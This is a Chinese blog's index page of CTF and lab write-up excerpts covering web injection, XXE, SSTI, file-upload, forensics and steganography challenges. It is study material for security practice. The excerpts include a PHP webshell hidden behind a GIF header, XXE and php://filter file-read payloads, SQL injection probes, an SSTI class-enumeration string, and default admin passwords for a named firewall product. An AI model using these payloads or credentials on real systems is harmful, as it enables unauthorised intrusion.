随笔分类 -  网安

上一页 1 2 3 4 5 6 7 下一页

[GKCTF 2021]excel 骚操作
摘要:[GKCTF 2021]excel 骚操作 打开excel,除了第一行的文字外,发现还有的表格中的内容为1 全选内容,然后修改单元格格式 此时1都显示出来了 接着把1替换为黑色背景的单元格 接着调整列宽为2 此时已经初具雏形,但是并不是我们常见的二维码,而是汉信码 解码后得到flag{9ee0cb6 阅读全文

posted @ 2024-12-22 16:38 跳河离去的鱼 阅读(271) 评论(0) 推荐(0)

[极客大挑战 2020]Roamphp1-Welcome
摘要:[极客大挑战 2020]Roamphp1-Welcome 一打开靶机发现无法正常访问 通过BP抓包后修改为POST方式请求,就能正常进入了 代码里可以看到,如果不是POST方式的话会报405 接着是参数判断,如果roam1和roam2参数都没有设置的话会显示源代码,这个很简单,我们直接看下一个if判 阅读全文

posted @ 2024-12-22 16:27 跳河离去的鱼 阅读(126) 评论(0) 推荐(0)

[NewStarCTF 公开赛赛道]HTTP
摘要:[NewStarCTF 公开赛赛道]HTTP GET方式传入name 源代码里发现key 修改cookie 阅读全文

posted @ 2024-12-09 17:18 跳河离去的鱼 阅读(105) 评论(0) 推荐(0)

[ACTF新生赛2020]music
摘要:[ACTF新生赛2020]music 打开附件发现视频文件损坏 放到010中发现出现多次A1字符 猜测对整个原文件进行了异或,使用010 Editor在工具->十六进制运算->二进制异或对整个文件内容进行异或 保存得到正常音频文件,听内容得到:actfabcdfghijk flag{abcdfghi 阅读全文

posted @ 2024-10-28 16:38 跳河离去的鱼 阅读(103) 评论(0) 推荐(0)

[CFI-CTF 2018]webLogon capture
摘要:[CFI-CTF 2018]webLogon capture 打开附件发现是流量分析题 追踪TCP流发现密码 解密得到flag,CFI{1ns3cur3_l0g0n} import binascii str = '%20%43%46%49%7b%31%6e%73%33%63%75%72%33%5f% 阅读全文

posted @ 2024-10-01 11:16 跳河离去的鱼 阅读(116) 评论(0) 推荐(0)

[MRCTF2020]Ezpop
摘要:[MRCTF2020]Ezpop Welcome to index.php <?php //flag is in flag.php //WTF IS THIS? //Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F 阅读全文

posted @ 2024-09-24 10:25 跳河离去的鱼 阅读(122) 评论(0) 推荐(0)

[网鼎杯 2020 朱雀组]phpweb
摘要:[网鼎杯 2020 朱雀组]phpweb 进来的页面不对劲,虽然不知道什么梗但是有一说一确实丑,如果注意一下还会发现这个页面在不断刷新,先抓个包看看。 发现这里上传了两个参数,分别是func和p。 对两个参数与返回值进行分析,我们使用date时一般是这种格式:date("Y-m-d+h:i:s+a" 阅读全文

posted @ 2024-09-23 18:41 跳河离去的鱼 阅读(285) 评论(0) 推荐(0)

某防火墙默认口令
摘要:某防火墙默认口令 打开靶场环境是一个登录页面 从标题得知是天清汉马的防火墙 查找资料得知 系统默认的管理员用户为admin,密码为venus.usg。用户可以使用这个管理员账号从任何地址登录设备,并且使用设备的所有功能。 系统默认的审计员用户为audit,密码为venus.audit。用户可以使用这 阅读全文

posted @ 2024-08-11 10:27 跳河离去的鱼 阅读(257) 评论(0) 推荐(0)

[HITCON 2017]SSRFme
摘要:[HITCON 2017]SSRFme 打开环境就是代码审计 <?php if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $http_x_headers = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']); 阅读全文

posted @ 2024-06-11 14:33 跳河离去的鱼 阅读(127) 评论(0) 推荐(0)

[CISCN2019 华北赛区 Day1 Web5]CyberPunk
摘要:[CISCN2019 华北赛区 Day1 Web5]CyberPunk 在源代码中发现提示可能存在文件包含,并且还有search.php,change.php,delete.php这三个文件,通过php伪协议进行读取 ?file=php://filter/convert.base64-encode/ 阅读全文

posted @ 2024-06-05 20:12 跳河离去的鱼 阅读(85) 评论(0) 推荐(0)

[NCTF2019]True XML cookbook
摘要:[NCTF2019]True XML cookbook 打开环境是之前一道题的登录框 先按原来那道题的payload进行测试,payload和结果如下: <?xml version="1.0" ?> <!DOCTYPE llw [ <!ENTITY file SYSTEM "file:///flag 阅读全文

posted @ 2024-05-20 09:16 跳河离去的鱼 阅读(231) 评论(0) 推荐(0)

[GWCTF 2019]枯燥的抽奖
摘要:[GWCTF 2019]枯燥的抽奖 打开环境,提示猜测完整字符串 在源代码中发现有个check.php文件 打开直接看到源码 <?php #这不是抽奖程序的源代码!不许看! header("Content-Type: text/html;charset=utf-8"); session_start( 阅读全文

posted @ 2024-05-19 10:45 跳河离去的鱼 阅读(152) 评论(0) 推荐(0)

[RCTF2015]EasySQL
摘要:[RCTF2015]EasySQL 打开环境,有一个注册一个登录按钮 这里注册的时候有个坑,邮箱那栏你不能输入@xx.com,否则就会报错不允许的字符 fuzz测试一下发现过滤了不少字符 注册完成后登录 首页的文字没有什么有用的信息,进入帐号发现可以修改密码 如果是正常的账号,此时修改密码不会有任何 阅读全文

posted @ 2024-05-14 16:12 跳河离去的鱼 阅读(428) 评论(0) 推荐(0)

[红明谷CTF 2021]write_shell
摘要:[红明谷CTF 2021]write_shell 打开环境直接给出源代码 <?php error_reporting(0); highlight_file(__FILE__); function check($input){ if(preg_match("/'| |_|php|;|~|\\^|\\+ 阅读全文

posted @ 2024-05-11 15:03 跳河离去的鱼 阅读(166) 评论(0) 推荐(0)

[watevrCTF-2019]Cookie Store
摘要:[watevrCTF-2019]Cookie Store 打开环境,发现第3个商品是flag cookie,但是要100刀,而我们只有50刀,买不起 点击第1个抓包 将session里的字符解码 看到了我们剩余的钱数是49,改成500,再把post的数据id=0改为id=2用来买我们的3号商品fla 阅读全文

posted @ 2024-05-10 16:01 跳河离去的鱼 阅读(129) 评论(0) 推荐(0)

Less17基于报错的字符型注入
摘要:Less17基于报错的字符型注入 打开环境是一个密码重置页面 在用户名栏输入各种语句都无效,遂审计源码 function check_input($value) { if(!empty($value)) { // truncation (see comments) $value = substr($ 阅读全文

posted @ 2024-05-06 09:33 跳河离去的鱼 阅读(55) 评论(0) 推荐(0)

Less11基于post提交的单引号闭合的字符型注入
摘要:Less11基于post提交的单引号闭合的字符型注入 一、手工注入 1.判断注入点 判断注入类型是否为数字型 1 or 1=1 1 or 1=2 发现页面显示相同,因此不是数字型 判断注入类型是否为字符型 1' or 1=1# 1' or 1=2# 发现1=2页面异常报错,1=1正常。所以是单引号字 阅读全文

posted @ 2024-05-05 19:20 跳河离去的鱼 阅读(64) 评论(0) 推荐(0)

[WUSTCTF2020]CV Maker
摘要:[WUSTCTF2020]CV Maker 打开环境 注册了账号登陆,发现有上传头像的地方,尝试上传文件 可以上传图片马 GIF89a <script language='php'> @eval($_POST['shell']);</script> BP里抓包改为php,得到上传成功路径http:/ 阅读全文

posted @ 2024-05-04 16:00 跳河离去的鱼 阅读(165) 评论(0) 推荐(0)

[CSCCTF 2019 Qual]FlaskLight
摘要:[CSCCTF 2019 Qual]FlaskLight 打开环境 源代码里发现可通过GET方式传入参数 简单验证发现存在SSTI {{''.__class__.__mro__[2].__subclasses__()}} #可以爆出所有的类 编写脚本查找可利用的类 利用subprocess.Pope 阅读全文

posted @ 2024-05-03 15:35 跳河离去的鱼 阅读(58) 评论(0) 推荐(0)

[Zer0pts2020]Can you guess it?
摘要:[Zer0pts2020]Can you guess it? 打开环境没有什么特殊的地方,可以点击按钮查看源码 <?php include 'config.php'; // FLAG is defined in config.php if (preg_match('/config\.php\/*$/ 阅读全文

posted @ 2024-05-02 14:34 跳河离去的鱼 阅读(56) 评论(0) 推荐(0)

上一页 1 2 3 4 5 6 7 下一页